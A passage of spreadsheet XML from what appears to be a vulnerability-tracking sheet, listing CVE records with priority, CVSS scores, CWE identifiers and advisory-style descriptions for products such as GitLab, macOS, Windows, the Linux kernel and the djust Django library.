      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.3 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions, an authenticated user could have induced a targeted user to perform unintended state-changing HTTP requests due to improper sanitization of user-controlled data in the Markdown JSON table renderer.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78252</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82786</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials issue exists in Remote I/O Coupler Unit (Server Type) CPSN-MCB271-*. If this vulnerability is exploited, sensitive information may be restored from a backup file.</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82786</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84535</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84535</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84577</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Golden Gate 27, macOS Tahoe 26.7. An app may be able to bypass sandbox restrictions.</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84577</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85921</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85921</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86107</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>The VeloCloud Edge and Gateway exhibit an out-of-bounds write vulnerability when processing tunneled IP fragments between authenticated overlay neighbors. This vulnerability impacts the VeloCloud VCMP tunnel protocol only.
A successful exploit can cause the affected process to terminate and restart, leading to a temporary disruption of traffic. Hosts on the internet that are unauthenticated and unable to form an overlay peer relationship can not trigger the vulnerable logic.</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86107</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89973</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: check the data direction of a C2HData PDU
nvme_tcp_handle_c2h_data() finds the request by command id and checks
that it has a payload, but it does not check that the command asked for
data to be read.  A controller that answers a write command with C2HData
therefore reaches nvme_tcp_recv_data(), where _copy_to_iter() hits
WARN_ON_ONCE(i-&gt;data_source) and returns 0.  The receive path turns that
into -EFAULT and resets the controller.
No data is copied, so this is not memory corruption.  What a controller
gets is a kernel warning it can raise at will, which is fatal on a host
booted with panic_on_warn.
The send path already knows the direction - it consults rq_data_dir()
when it builds a command - and nvme_tcp_handle_r2t() checks the length
and the offset of the request it names.  The C2HData path does not check
the direction at all.
Reject a C2HData PDU whose command is not a read.  Rejecting it fails
the command and resets the controller, as the neighbouring check in this
function does; what goes away is the warning.
  [    6.885580] ------------[ cut here ]------------
  [    6.886457] WARNING: lib/iov_iter.c:193 at _copy_to_iter+0x289/0x1330, CPU#0: kworker/0:1H/71
  [    6.888137] CPU: 0 UID: 0 PID: 71 Comm: kworker/0:1H Not tainted 7.2.0-rc5-NVMETCP-gf5098b6bae76 #1 PREEMPT(lazy)
  [    6.891165] Workqueue: nvme_tcp_wq nvme_tcp_io_work
  [    6.891875] RIP: 0010:_copy_to_iter+0x289/0x1330
  [    6.903739] Call Trace:
  [    6.904085]  &lt;TASK&gt;
  [    6.909254]  __skb_datagram_iter+0x433/0x820
  [    6.911026]  skb_copy_datagram_iter+0x37/0x120
  [    6.911622]  nvme_tcp_recv_skb+0xa07/0x4320
  [    6.913378]  __tcp_read_sock+0x1ab/0x810
  [    6.915788]  nvme_tcp_try_recv+0x152/0x1e0
  [    6.918222]  nvme_tcp_io_work+0x1e4/0x6c0
  [    6.926906]  &lt;/TASK&gt;
  [    6.927226] ---[ end trace 0000000000000000 ]---
  [    6.927878] nvme nvme0: queue 1 failed to copy request 0x71 data
  [    6.928709] nvme nvme0: receive failed:  -14</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89973</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92729</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions 0.88.0 through 0.141.0 fail to apply authorization wrappers to trace-funnel analytics endpoints in the HTTP handler. Unauthenticated attackers can submit arbitrary funnel definitions to retrieve trace analytics including identifiers, durations, span counts, service topology, and error activity without credentials.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92729</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-43936</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>Dell ObjectScale, versions prior to ObjectScale 4.4.0.0, contains an Improper Authentication vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-43936</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16335</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to read, write, or delete arbitrary files due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16335</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20335</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20335 are related to incorrect calculation issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-682.</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20335</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27552</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit improper authorization in the /index.php/attached_devices_tab/do_upload endpoint to upload IODD files to the device, potentially altering device behavior or causing system crashes.</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27552</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54178</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>backpack/crud provides Create, Read, Update &amp; Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. Prior to 6.8.12 and 7.0.35, HasUploadFields::uploadMultipleFilesToDisk in src/app/Models/Traits/HasUploadFields.php trusts disk-relative paths from clear_&lt;attribute&gt;[] and passes them to Storage::disk()-&gt;delete without confirming that the paths are persisted on the current model record. An authenticated user with Update access to a CRUD using this mutator through src/app/Models/Traits/CrudTrait.php can delete another record's attachment, a shared asset, or another operational file on the configured disk by submitting its path. The newer MultipleFiles uploader is not affected because it intersects requested deletions with the record's persisted file list. This flaw does not permit reading the deleted files. The 5.x line remains affected through its final releases. This issue is fixed in versions 6.8.12 and 7.0.35.</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54178</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61591</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M387" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-915</t>
        </is>
      </c>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, for views that opt into state snapshots, the snapshot `state_json` embedded in the client page was restored on reconnect as trusted view state with no integrity check. A client could edit the unsigned `state_json` in their page and return it in the reconnect mount frame to inject arbitrary view attributes — e.g. flip `is_admin` to `True`, or change `account_id` / `balance` — escalating privilege or tampering with business state held in public view attributes (the normal djust pattern). This issue is fixed in djust 1.0.7. State snapshots are signed; unsigned or forged snapshots are rejected on the back-navigation restore path. As a workaround, do not enable state snapshots; do not hold authorization/ownership state in public view attributes.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61591</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61593</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M388" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the SSE client→server POST endpoints are `@csrf_exempt` and the SSE GET stream endpoint had no Origin check, so a cross-origin page could drive a victim-cookie-authenticated SSE session: force the victim's browser to GET the stream URL (which creates and mounts a LiveView as the victim) and POST to the message endpoint with `credentials: include` to fire state-changing event handlers as the victim. The URL `session_id` is client-chosen (validated only for UUID *format*), so it is not a CSRF token, and a JSON body sent as `text/plain` is a CORS simple request with no preflight. The issue is fixed in 1.0.7. All three SSE endpoints validate the request `Origin` against `ALLOWED_HOSTS` (mirroring the WebSocket CSWSH defense) and reject cross-origin requests with 403; the POST endpoints additionally require `Content-Type: application/json` (415 otherwise), closing the `text/plain` simple-request bypass. As a workaround, disable the SSE transport, or front it with a proxy that enforces an Origin allowlist.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61593</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63671</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr">
        <is>
          <t>npm:@nuxtjs/mdc</t>
        </is>
      </c>
      <c r="M389" s="5" t="inlineStr">
        <is>
          <t>0.22.1</t>
        </is>
      </c>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="R389" s="5" t="inlineStr">
        <is>
